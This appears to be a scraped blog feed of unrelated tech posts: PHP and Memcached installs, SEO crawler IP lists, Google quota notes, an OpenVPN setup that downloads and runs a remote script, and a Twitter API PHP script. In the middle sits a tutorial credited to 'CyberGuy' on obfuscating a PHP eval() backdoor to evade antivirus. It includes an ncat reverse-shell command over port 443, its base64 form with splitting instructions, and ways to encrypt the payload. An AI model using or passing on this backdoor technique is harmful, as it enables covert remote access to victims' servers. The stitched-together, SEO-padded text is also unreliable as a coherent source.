Install Memcached in PHP8.2-FPM+ With NGINX Ubuntu

0. Don’t forget to install pear for pecl call.

sudo apt-get install -y php8.2-pear

1. After You install the php8.2-fpm you run this command:

sudo apt-get -y install gcc make autoconf libc-dev pkg-config
sudo apt-get -y install zlib1g-dev
sudo apt-get -y install libmemcached-dev
sudo pecl install memcached

RESULT:

WARNING: channel "pecl.php.net" has updated its protocols, use "pecl channel-update pecl.php.net" to update
pecl/memcached can optionally use PHP extension "igbinary" (version >= 2.0)
pecl/memcached can optionally use PHP extension "msgpack" (version >= 2.0)
downloading memcached-3.2.0.tgz …
Starting to download memcached-3.2.0.tgz (90,722 bytes)
…………………done: 90,722 bytes
18 source files, building
running: phpize

When you are shown the following prompts, you will want to press Enter to select the default option for all of the prompts except for enable sasl. When shown the enable sasl prompt, input “no”, then press Enter.

Configuring for:
PHP Api Version: 20220829
Zend Module Api No: 20220829
Zend Extension Api No: 420220829
libmemcached directory [no] : no
zlib directory [no] : no
use system fastlz [no] : no
enable igbinary serializer [no] : no
enable msgpack serializer [no] : no
enable json serializer [no] : no
enable server protocol [no] : no
enable sasl [yes] : non
enable sessions [yes] :

Once installed, create a configuration file for the extension and restart PHP by running the following commands as root

sudo bash -c "echo 'extension=memcached.so' >> /etc/php/8.2/fpm/php.ini"
sudo bash -c "echo 'extension=memcached.so' >> /etc/php/8.2/cli/php.ini"
sudo service php8.2-fpm restart

Reference Link

TOP SEO Domain Metric Checker Website | 100% Free

Scan your website & get a roadmap for SEO strategy, backlinks, UX, semantics & content. A free list of tailored improvements for your website. Get it in 4 minutes! 32+ trillion backlinks. Analyze your on-page SEO in one click, get customized suggestions and improve your. rankings. Audit your site today to improve engagement for your audiences!

Link Building is King. Harness that Social Media Power. Add an RSS Feed Subscription Box. Don’t Shy from Blog Commenting. Guest Posting is Still Hot. Forums Posting Is a Thing. Build Trust.

On-page SEO focuses on optimizing parts of your website that are within your control, while offpage SEO focuses on increasing the authority of your domain. Try to use my domain to check the metric https://josuamarcelc.com you may compare it with yours.

Free SEO Domain Checker List:

Installing and Configuring Memcached with PHP8.2

Memcached is a high-performance, distributed memory caching system designed to speed up dynamic web applications by alleviating database load. It is widely used to enhance the performance of web-based applications by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. This article will guide you through the process of installing Memcached on your server and integrating it with PHP.

Read also How to Install Memcached in CodeIgniter Framework

After installing php8.2 with nginx you might install the main memcached and the memcached for PHP.

sudo apt-get update
sudo apt-get install memcached
sudo apt-get install php8.2-memcached

Conclusion: You have successfully installed and configured Memcached with PHP. Memcached is a powerful tool for improving the performance of your PHP applications. It’s easy to set up and integrate, and it can significantly reduce the load on your database by caching frequently accessed data.

Additional Tips:

  • Regularly monitor your Memcached usage.
  • Secure your Memcached server, especially if it’s on a public network.
  • Keep your software updated for security and performance improvements.

Top Crawlers Bots IP Ranges For Search Engine Optimization

In the world of Search Engine Optimization (SEO), understanding the behavior of search engine crawlers is crucial. These crawlers, also known as bots or spiders, are automated programs used by search engines like Google, Bing, and others to scan and index the content of websites. By identifying the IP ranges of these crawlers, webmasters can optimize their websites more effectively. This article delves into the top crawlers, their IP ranges, and how this knowledge benefits SEO.

ENGINEENDPOINT
Google IP Rangeshttps://www.gstatic.com/ipranges/goog.json
Google Botshttps://developers.google.com/static/search/apis/ipranges/googlebot.json
Google Special Crawlershttps://developers.google.com/static/search/apis/ipranges/special-crawlers.json
Google User Triggeredhttps://developers.google.com/static/search/apis/ipranges/user-triggered-fetchers.json
Global and regional external IP address ranges for customers’ Google Cloud resourceshttps://www.gstatic.com/ipranges/cloud.json
BingBot IP Rangeshttps://www.bing.com/toolbox/bingbot.json
DuckDuckGo Botshttps://duckduckgo.com/duckduckgo-help-pages/results/duckduckbot/
Ahref Crawler IP Rangeshttps://api.ahrefs.com/v3/public/crawler-ip-ranges
Yandex IP Rangeshttps://yandex.com/ips
Facebook IP Rangeshttps://developers.facebook.com/docs/sharing/webmasters/crawler/

ReferencesLink
All Crawlers User Agentshttps://gist.github.com/josuamarcelc/6bfbdc14c6292e195844032bea7211d1
Google Crawler Indexinghttps://developers.google.com/search/docs/crawling-indexing/verifying-googlebot
Yandex Robotshttps://yandex.com/support/webmaster/robot-workings/check-yandex-robots.html
Moz RogerBothttps://moz.com/help/moz-procedures/crawlers/rogerbot
Verify Bingbothttps://www.bing.com/webmasters/help/verify-bingbot-2195837f

Cloud IPsReference Link
IP Ranges v4https://www.cloudflare.com/ips-v4/#
IP Ranges V6https://www.cloudflare.com/ips-v6/#
API IP Rangeshttps://api.cloudflare.com/client/v4/ips
Yandex Cloud IPshttps://cloud.yandex.com/en/docs/vpc/concepts/ips

Understanding Search Engine Crawlers

What Are Crawlers?

Crawlers are automated programs that visit websites to read and index their content. They follow links from one page to another, thereby creating a map of the web that search engines use to provide relevant search results.

Importance in SEO

Recognizing crawlers is essential in SEO as it ensures that your website is indexed correctly. Proper indexing increases the chances of your website appearing in search results, thereby driving organic traffic.

Top Search Engine Crawlers and Their IP Ranges

Googlebot

  • Primary Role: Indexing websites for Google Search.
  • IP Range: Googlebot IPs typically fall within the range owned by Google. However, due to the vast number of IP addresses Google owns, it’s more efficient to verify Googlebot by using the reverse DNS lookup method.

Bingbot

  • Primary Role: Crawling for Microsoft’s Bing search engine.
  • IP Range: Bingbot also uses a range of IP addresses. Similar to Googlebot, it’s advisable to use reverse DNS lookups to confirm the legitimacy of Bingbot.

Baiduspider

  • Primary Role: Indexing for the Baidu search engine, predominantly used in China.
  • IP Range: Baiduspider’s IP ranges are published by Baidu and can be found in their webmaster tools documentation.

Yandex Bot

  • Primary Role: Crawling for Russia’s Yandex search engine.
  • IP Range: Yandex provides a list of IP addresses for its crawlers, which can be found in their official documentation.

Why Knowing IP Ranges Matters

  1. Security: Distinguishing between legitimate crawlers and malicious bots is crucial for website security.
  2. Accurate Analytics: Identifying crawler traffic helps in obtaining more accurate analytics data, as it separates human traffic from bot traffic.
  3. SEO Optimization: Understanding crawler behavior helps in optimizing websites for better indexing and ranking.
  4. Resource Management: It helps in managing server resources effectively, as crawlers can consume significant bandwidth.

Best Practices for Managing Crawler Traffic

  • Robots.txt File: Use this to guide crawlers on which parts of your site to scan and which to ignore.
  • Monitoring Server Logs: Regularly check server logs for crawler activities to ensure that your site is being indexed properly.
  • Updating Sitemaps: Keep your sitemaps updated to aid crawlers in efficient website navigation.

Conclusion

Recognizing and understanding the IP ranges of top search engine crawlers is a vital aspect of SEO. It helps in distinguishing between genuine search engine bots and potential security threats, enhances website performance, and contributes to more effective SEO strategies. As search engines evolve, staying informed about crawler activities and best practices is essential for maintaining and improving your website’s search engine visibility.

Quota Exceed While Request Indexing to Google Search Console

Search Analytics

Search Analytics quota falls in two types: load limits and QPS limits. The “quota exceeded” error is the same for all quota exceeded events.

Load quota

Load represents the internal resources consumed by a query. Most users will not exceed load limits, but if you do, you will receive a “quota exceeded” error message. The Search Analytics resource enforces the following load limits:

  • Short-term load quota: Short-term quota is measured in 10 minute chunks. To fix:
    • If you exceed your quota, wait 15 minutes and try again. If you still exceed quota, you are exceeding long-term quota.
    • If you are exceeding short-term quota only, spread out your queries throughout the day.
  • Long-term load quota: Long-term quota is measured in 1 day chunks. If you exceed quota when running only a single query inside a 10 minute period, you are exceeding your long-term quota. To fix:
    • Queries are expensive when you group and/or filter by either page or query string. Queries grouped/filtered by page AND query string are the most expensive. To reduce your load for these queries, remove the grouping and/or filtering for the page and/or query string.
    • Query load increases with the date range queried. So queries with a six month range are much more expensive than a query with a one day range.
    • Avoid requerying the same data (for example, querying all data for last month over and over).

QPS quota

The Search Analytics resource enforces the following QPS (queries per second) QPM (queries per minute) and QPD (queries per day) limits:

  • Per-site quota (calls querying the same site):
    • 1,200 QPM
  • Per-user quota (calls made by the same user):
    • 1,200 QPM
  • Per-project quota (calls made using the same Developer Console key):
    • 30,000,000 QPD
    • 40,000 QPM

Example

  • User A can make up to 1,200 QPM combined to her 3 websites.
  • Users A and B can make up to 1,200 QPM combined to their one website.

URL inspection

  • Per-site quota (calls querying the same site):
    • 2000 QPD
    • 600 QPM
  • Per-project quota (calls made using the same Developer Console key):
    • 10,000,000 QPD
    • 15,000 QPM

All other resources

  • Per-user limit (calls made by the same user):
    • 20 QPS
    • 200 QPM
  • Per-project limit (calls made using the same Developer Console key):
    • 100,000,000 QPD

Reference: https://developers.google.com/webmaster-tools/limits

Set Up OpenVPN Server In 3 Minutes

sudo apt update
sudo apt upgrade

ip a
ip a show eth0

dig +short myip.opendns.com @resolver1.opendns.com
dig TXT +short o-o.myaddr.l.google.com @ns1.google.com | awk -F'"' '{ print $2}'
wget https://git.io/vpn -O openvpn-install.sh
chmod +x openvpn-install.sh

sudo ./openvpn-install.sh

Sample session from AWS/Lightsail where my cloud server is behind NAT:

Sample session from Linode/DO server where cloud server has Direct Public

To avoid problem always choose DNS as 1.1.1.1 or Google DNS. Those are fast DNS server and reached from anywhere on the Internet.

Submitting your sitemap to search engines via HTTP GOOGLE AND BING

Submitting your sitemap to search engines via HTTP can be done using a straightforward method. Here are the general steps to submit your sitemap using an HTTP request:

  1. Create or Generate Your Sitemap:
    • If you haven’t already, create a valid XML sitemap for your website. This sitemap should list all the URLs you want search engines to index.
  2. Host the Sitemap on Your Web Server:
    • Upload your sitemap file to your web server or hosting account. You should be able to access it via a URL, such as https://yourwebsite.com/sitemap.xml.
  3. Use a Web Browser or Command-Line Tool:
    • You can use a web browser or a command-line tool like curl or wget to send an HTTP request to search engines. Below are examples of how to do this:
    Using a Web Browser:
    • Open your web browser and visit the respective URL to submit your sitemap to Google or Bing:
      • For Google: https://www.google.com/ping?sitemap=https://yourwebsite.com/sitemap.xmlFor Bing: https://www.bing.com/ping?sitemap=https://yourwebsite.com/sitemap.xml
      Replace https://yourwebsite.com/sitemap.xml with the actual URL of your sitemap.
    Using Command-Line Tools (e.g., curl):
    • Open your command-line interface and run one of the following commands to submit your sitemap to Google:bashCopy codecurl -H "Content-Type: text/plain" --data "https://yourwebsite.com/sitemap.xml" "https://www.google.com/ping?sitemap"
    • Or submit your sitemap to Bing:bashCopy codecurl -H "Content-Type: text/plain" --data "https://yourwebsite.com/sitemap.xml" "https://www.bing.com/ping?sitemap"
  4. Check the Response:
    • After submitting the HTTP request, you should receive a response from the search engine. This response will typically indicate whether the sitemap submission was successful.
  5. Monitor Search Console:
    • Although submitting via HTTP can notify search engines of your sitemap, it’s a good practice to monitor your Google Search Console and Bing Webmaster Tools accounts. These tools provide more insights into the indexing status of your website and any potential issues.

Submitting your sitemap via HTTP is a convenient and straightforward way to inform search engines about your website’s structure and content updates. However, keep in mind that while this method helps with initial discovery, it does not replace the need for regular monitoring and management of your website’s SEO through official search engine webmaster tools.

PHP Shell Eval() Backdoor Obfuscation

Introduction

When working with any programing or scripting language you might ask your self is this language could be used for “hacking”, this question in the beginning could be very superficial but let’s take it real. I do love PHP a lot to be honest, I’m using it in everything, in web, cryptography when I want to perform cryptographical tasks and even in backdoors, Its very clear language and its purpose and more in very good way. I asked my self what If we can do something new with this great language, let’s obfuscate a backdoor to avoid detection by AV and at the same time let’s make this code behaves like an ordinary code and from here the idea came.

Walk through the standards

Before starting any thing new you should put your standards and policies first to see how you should build your new theory, for example I put the following standards for me to follow and care about:

  • Payload delivery
  • Symantec and Signature based detections
  • Readability of the code
  • Command execution workflow
  • Firewalls

And more but these are my major standards I want to care about them while crafting this backdoor.

Planning for the theory

Now after we knew what we going to do and what standards we should follow we came to the planning section, I wanted to make something new to the security appliances, something isn’t commonly used against these appliances, so, the chances of detection will be decreased. In my plan I decided to follow the following rules:

Using multiple foreign languages which rarely used to write our backdoor.

Every variable with certain languages should have its own reference variable which basically written in different variable, this step will confuse the code more and more.

Variables sequences should be varied, so, debugging or deobfuscating the code now should be harder.

System commands and PHP codes will be used in this mission should be encoded, truncated and every truncated part should be in a single variable, each single variable should has its own reference variable and this reference variable should follow the standards mentioned before, in addition the sequence of truncated encoded string should be varied in sorting, but when decoding it using decoder function it will be concatenated in the right sequence with the reference variable used and we can make a mix of reference and standard variables as we will see later in this article.

The decoder function also should be obfuscated by truncating it following the previous rules, then using it as a variable to decode the encoded string.

Variables names also should consists of special characters like ‘_’ and numbers, for example if we have language like the Chinese language, maybe one word in English translated to two strings in Chinese, so we can used multiple forms and identifying more than single variable with the same name, like:

$最後の4

$最後の3

$最後の_3

$最_後の1

This would confuse the code more and more.

Its optionally and recommended in my point of view to encrypt your obfuscated code then make a backdoor decrypt the obfuscated code and run it immediately, so, your code will be very safe because it’s just decrypt a string then execute that string, but deeply it’s a backdoor. Kindly want to note here that windows installation of PHP is very funny, so, it disables the openssl extension by default when installing but allows eval function 🙂 .. this means if you want to use the encryption method you should make sure that your target enabled the openssl extension, but if your target was links then no worries.

1. Start crafting the command

Yes we will do obfuscating to our code, but even the system command should be executed somehow safely, you can also obfuscate the system command!, but let’s make it simple this time and make a standard payload but with some security standards to avoid detection, first of all let’s list the standards we’ll follow while doing this crafting:

Connecting to our remote host using standard port usually opened and whitelisted in Firewalls .e.g. 443.

Turning off any verbose because we want to make everything silent and at the same time clean in the compromised machine.

Running the command in the background trying to make it silent more and more.

And just for notice, system command may not lead directly to reverse shell, for example you can make the powershell download a ps script then run it in the memory directly and gaining reverse shell, but because here we’re concentrating in the obfuscation we’ll make it as simple as we can, so, we’ll use netcat.

The command I used in this obfuscated payload is:

system(“start /b ncat.exe 192.168.245.213 443 -e cmd.exe”);

And for sure the IP here varied but other than the IP is the same. Now as explained before we should encode, and here the encoded text is:

c3lzdGVtKCJzdGFydCAvYiBuY2F0LmV4ZSAxOTIuMTY4LjI0NS4yMTMgNDQzIC1lIGNtZC5leGUiKTs=

Note: If you did obfuscated a payload then found a base padding like: — == — at the end of the base you can safely remove it as a type of confusing and hiding the identity of the encoding / base, and we did this here.

Let’s discuss how we should use it in our obfuscated code:

c3lzdGVtKCJ || zdGFydCA || vYiBuY2F0LmV4ZS || AxOTIuMTY4L || jI0NS4 || yMTMgNDQzIC1l || IGNtZC5leGUiKTs

We can truncated with non-standard truncation as you can see above, which means every part of the base64 here will be in different bits, so, when sorting it into the variables it will be hard to detect if these strings are related to each other or not, for example:

The encoded PHP system command execution and the system command itself.

So, as you can see in the picture above the encoded payload length varied and the sequence is not the right sequence for this encoding to work, but when we gonna decode it, we’ll put the right sequence — obfuscated surely —

2. Handling the decoding function

As we know, we did encoded the payload which will be executed — including the PHP system command executing function — and now we should do the same with decoding function, if remember what we said in the Planning section about the decoding function, we said that even the decoding function should be obfuscated, truncated and non-sorted also. Let’s take a look at this part of the code:

Before continue we should note again that you can make your own base encoding function and obfuscate it — it would be better — even you can do other techniques like ROT13 and you can develop it too. Let’s continue here and discuss the above code, here we did truncated the function name to many parts trying to hide it and also you may ask: but its in plain text, is it ok? and the answer is yes and no:

Yes, because simply it will be putted in reference variables by the way so it will be hard to find / detect.

No, because we can use techniques like reverse or ROT13 then pass it as function after decoding from these techniques and it would be better.

And now you’ll see that when we going to use it, we’ll use it references which already referenced :), so, it will be like that:

So, now the base64 being used easily as function from the variable which already uses a reference variable mixed with standard variables. Then now it runs the decoding function safely without any problems here.

3. Payload handling while decoding

This part is the easiest part in this techniques, all what you should do is to avoid using the encoded payload part directly, you should use reference variables with the techniques / rules explained before, this make the payload more confused. We can also concatenate the payload by grouping every couple of encoded parts in a group then using it again — with the right sequence of encoded payload to decode it right — we can discuss that in the following code:

4. Obfuscated payload with reference variables

Here I didn’t marked all the payloads but you get the point now, and if you concentrated here specially:

Here we used the variable $最後の3 to store a part of base64_decode function and at the same time we used $最後の4 to be used as a reference to the variable $_變量1 which stores a part of the payload will be executed, so, it will be confusing to use the same variable with changing only one character for very different purpose, and the same for the other variables highlighted, its the art of obfuscation.

5. Executing the magic

Finally now we’ll execute the decoded base64 using eval function as shown:

And now simply when running it, it will give us the reverse shell we want with persistence even if the user hit CTRL + C because we did it in the background if you remember:

6. Final touches

As mentioned you can also use the encryption to hide the entire obfuscated payload, in the following code:

Here we will encode our obfuscated code first to handle it safely in this encryption phase and to avoid bugs, by the way it will be saved inside base64_decode() function, so, if any other function will handle it, it will be the ordinary code without encoding. We’ll take this encrypted / ciphered backdoor now and will do the following:

Here we’re going to decrypt the ciphered obfuscated payload and run it into eval function immediately as you can see.

7. Conclusion

The obfuscation is an art, there are no limits to what you can do, always think crazily and outside the box, be the red and blue teamer then cock your payload and feed it to the system.

Source: CyberGuy

Install PHP 8.2.8 In Ubuntu NGINX Server

PHP 8.2 also includes bug fixes and performance improvements over previous versions like 8.1. We recommend you test your codebase with PHP 8.2 before upgrading in a production setup, just to ensure that everything works as expected.

In this article we shall cover steps that are used in the installation of PHP 8.2 on Ubuntu 22.04|20.04|18.04. The default version of PHP available on OS repositories is usually older than PHP official latest releases. PPA (Personal Package Archive) software repositories for PHP allows you to install newer releases of PHP on your Ubuntu system that are not available in the official repositories of a Linux distribution.

sudo apt update

sudo apt install -y lsb-release gnupg2 ca-certificates apt-transport-https software-properties-common

sudo add-apt-repository ppa:ondrej/php

sudo apt install php8.2-cli php8.2-fpm php8.2-common php8.2-mysql php8.2-pgsql php8.2-zip php8.2-gd php8.2-mbstring php8.2-curl php8.2-xml php8.2-bcmath php8.2-memcached

php -v

PHP 8.2.8 (cli) (built: Jul 8 2023 07:10:21) (NTS)
Copyright (c) The PHP Group
Zend Engine v4.2.8, Copyright (c) Zend Technologies
with Zend OPcache v8.2.8, Copyright (c), by Zend Technologies

How To Get Twitter Trends API OAuth with PHP Script

You currently have Essential access which includes access to Twitter API v2 endpoints only. If you need access to this endpoint, you’ll need to apply for Elevated access via the Developer Portal.

https://developer.twitter.com/en/docs/twitter-api/getting-started/about-twitter-api#item0

{
  "errors": [
    {
      "message": "You currently have Essential access which includes access to Twitter API v2 endpoints only. If you need access to this endpoint, you’ll need to apply for Elevated access via the Developer Portal. You can learn more here: https://developer.twitter.com/en/docs/twitter-api/getting-started/about-twitter-api#v2-access-leve",
      "code": 453
    }
  ]
}


Here’s a sample PHP script that uses the Twitter API OAuth authentication process to get the current trending topics:

<?php

// Replace with your own values
$consumer_key = 'xxxxxx';
$consumer_secret = 'xxxxxx';

// Set up the URL for the OAuth request
$url = "https://api.twitter.com/oauth2/token";

// Set up the headers for the OAuth request
$headers = array(
    "Content-Type: application/x-www-form-urlencoded;charset=UTF-8",
    "Authorization: Basic " . base64_encode($consumer_key . ":" . $consumer_secret)
);

// Set up the data for the OAuth request
$data = "grant_type=client_credentials";

// Initialize a cURL session
$curl = curl_init();

// Set the cURL options
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

// Send the OAuth request and get the response
$response = curl_exec($curl);

// Close the cURL session
curl_close($curl);

// Decode the JSON response
$json = json_decode($response);

// Get the access token from the response
$access_token = $json->access_token;

// Set up the URL for the Trends API request
$url = "https://api.twitter.com/1.1/trends/place.json?id=1";

// Set up the headers for the Trends API request
$headers = array(
    "Authorization: Bearer " . $access_token
);

// Initialize a new cURL session
$curl = curl_init();

// Set the cURL options
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

// Send the Trends API request and get the response
$response = curl_exec($curl);
var_dump($response);
// Close the cURL session
curl_close($curl);

// Decode the JSON response
$json = json_decode($response);

// Print out the top 10 trending topics in the United States
for ($i = 0; $i < 10; $i++) {
    echo ($i+1) . ". " . $json[0]->trends[$i]->name . "\n";
}

?>

Make sure to replace YOUR_CONSUMER_KEY and YOUR_CONSUMER_SECRET with your own Twitter API credentials.

This script first makes an OAuth 2.0 request to obtain an access token, then uses that access token to make a request to the Trends API and print out the top 10 trending topics in the United States. You can modify the id parameter in the Trends API URL to get trending topics for a different location.

[wpedon id=2706]

Exit mobile version